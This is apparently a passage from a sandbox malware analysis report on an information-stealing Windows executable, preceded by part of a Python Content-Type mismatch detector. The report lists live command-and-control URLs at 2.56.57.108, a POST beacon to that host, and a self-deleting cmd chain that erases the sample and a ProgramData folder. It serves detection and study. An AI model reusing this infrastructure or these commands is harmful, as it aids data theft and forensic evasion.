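    for name, resp in [("image/jpeg with PE body", FAKE_JPEG_RESPONSE),
                       ("image/jpeg with JPEG body", REAL_JPEG_RESPONSE),
                       ("octet-stream with PE body", OCTET_RESPONSE)]:
        print(name, "->", content_type_mismatch(resp) or "consistent")
```

A PE served as application/octet-stream is not flagged here on purpose: the signal in this report is the lie in the Content-Type, not the download of a PE as such; tighten the rule to "any PE body" if the environment never legitimately downloads executables.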
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.56.57.108
Source: gunzipped.exe, gunzipped.exe, 00000001.00000002.332350295.00000000007D7000.00000002.00000001.sdmp, gunzipped.exe, 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, gunzipped.exe, 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp String found in binary or memory: http://2.56.57.108/osk/
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//1.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp String found in binary or memory: http://2.56.57.108/osk//1.jpghttp://2.56.57.108/osk//4.jpghttp://2.56.57.108/osk//7.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//2.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp String found in binary or memory: http://2.56.57.108/osk//2.jpghttp://2.56.57.108/osk//6.jpghttp://2.56.57.108/osk//3.jpghttp://2.56.5
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//3.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//4.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//5.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//5.jpg2
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp String found in binary or memory: http://2.56.57.108/osk//6.jpg
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp, gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//7.jpg
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp String found in binary or memory: http://2.56.57.108/osk//7.jpgB
Source: gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp String found in binary or memory: http://2.56.57.108/osk//main.php
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: gunzipped.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: gunzipped.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /osk//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007D1CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s, 1_2_007D1CF0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00404DEB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404DEB

System Summary:

Uses 32bit PE files
Source: gunzipped.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_004030C7 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030C7
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_0040315E CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_0040315E
Detected potential crypto function
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_004045FC 0_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33727E 0_2_6F33727E
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309F37 0_2_6F309F37
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309320 0_2_6F309320
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33FB2D 0_2_6F33FB2D
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F307303 0_2_6F307303
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308F07 0_2_6F308F07
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308B0F 0_2_6F308B0F
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308B64 0_2_6F308B64
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30936B 0_2_6F30936B
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F307340 0_2_6F307340
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309F48 0_2_6F309F48
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A74A 0_2_6F30A74A
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308F4E 0_2_6F308F4E
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3073B3 0_2_6F3073B3
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A3A7 0_2_6F30A3A7
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308FAF 0_2_6F308FAF
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3093F6 0_2_6F3093F6
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309FF8 0_2_6F309FF8
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33D3E2 0_2_6F33D3E2
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33EBC1 0_2_6F33EBC1
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308BC2 0_2_6F308BC2
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30963B 0_2_6F30963B
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308610 0_2_6F308610
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308E1C 0_2_6F308E1C
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33CE70 0_2_6F33CE70
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F335A60 0_2_6F335A60
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308E69 0_2_6F308E69
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F303F55 0_2_6F303F55
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308A51 0_2_6F308A51
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3072A7 0_2_6F3072A7
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F319040 0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A2AE 0_2_6F30A2AE
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309E96 0_2_6F309E96
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309EE9 0_2_6F309EE9
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3092D0 0_2_6F3092D0
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A134 0_2_6F30A134
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309937 0_2_6F309937
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308D3A 0_2_6F308D3A
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309522 0_2_6F309522
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F307529 0_2_6F307529
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F304758 0_2_6F304758
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309D17 0_2_6F309D17
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308505 0_2_6F308505
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33BD05 0_2_6F33BD05
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309165 0_2_6F309165
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308D67 0_2_6F308D67
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33D954 0_2_6F33D954
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F301CD1 0_2_6F301CD1
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3085BD 0_2_6F3085BD
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309DA1 0_2_6F309DA1
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3031AC 0_2_6F3031AC
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3095D4 0_2_6F3095D4
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308DD7 0_2_6F308DD7
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309DDF 0_2_6F309DDF
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30B9C3 0_2_6F30B9C3
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309430 0_2_6F309430
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A038 0_2_6F30A038
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A439 0_2_6F30A439
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308817 0_2_6F308817
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A078 0_2_6F30A078
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30747A 0_2_6F30747A
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30947B 0_2_6F30947B
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309860 0_2_6F309860
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309061 0_2_6F309061
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308C5F 0_2_6F308C5F
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F309C42 0_2_6F309C42
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3094B0 0_2_6F3094B0
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A0BA 0_2_6F30A0BA
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308CA6 0_2_6F308CA6
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3098AC 0_2_6F3098AC
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F308881 0_2_6F308881
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30A0F2 0_2_6F30A0F2
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3090F8 0_2_6F3090F8
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3094FC 0_2_6F3094FC
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3090DF 0_2_6F3090DF
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_004045FC 1_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007C3C90 1_2_007C3C90
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007C3480 1_2_007C3480
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007C3060 1_2_007C3060
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007C3AA0 1_2_007C3AA0
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007B4B10 1_2_007B4B10
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\gunzipped.exe Code function: String function: 007B8C20 appears 41 times
Source: C:\Users\user\Desktop\gunzipped.exe Code function: String function: 004029E8 appears 47 times
Source: C:\Users\user\Desktop\gunzipped.exe Code function: String function: 007D2F70 appears 391 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_0019F1B7 NtQueryInformationProcess, 0_2_0019F1B7
Sample file is different than original file name gathered from version info
Source: gunzipped.exe, 00000000.00000003.306104413.0000000002E06000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000003.310975930.0000000002F9F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.319062332.0000000003341000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs gunzipped.exe
PE file contains more sections than normal
Source: sqlite3.dll.1.dr Static PE information: Number of sections : 19 > 10
Source: gunzipped.exe ReversingLabs: Detection: 53%
Source: C:\Users\user\Desktop\gunzipped.exe File read: C:\Users\user\Desktop\gunzipped.exe
Source: gunzipped.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gunzipped.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068
Source: C:\Users\user\Desktop\gunzipped.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1068)
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\Users\user\AppData\Local\Temp\nsy255E.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/15@0/1
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar, 0_2_00402012
Source: C:\Users\user\Desktop\gunzipped.exe File read: C:\Users\desktop.ini
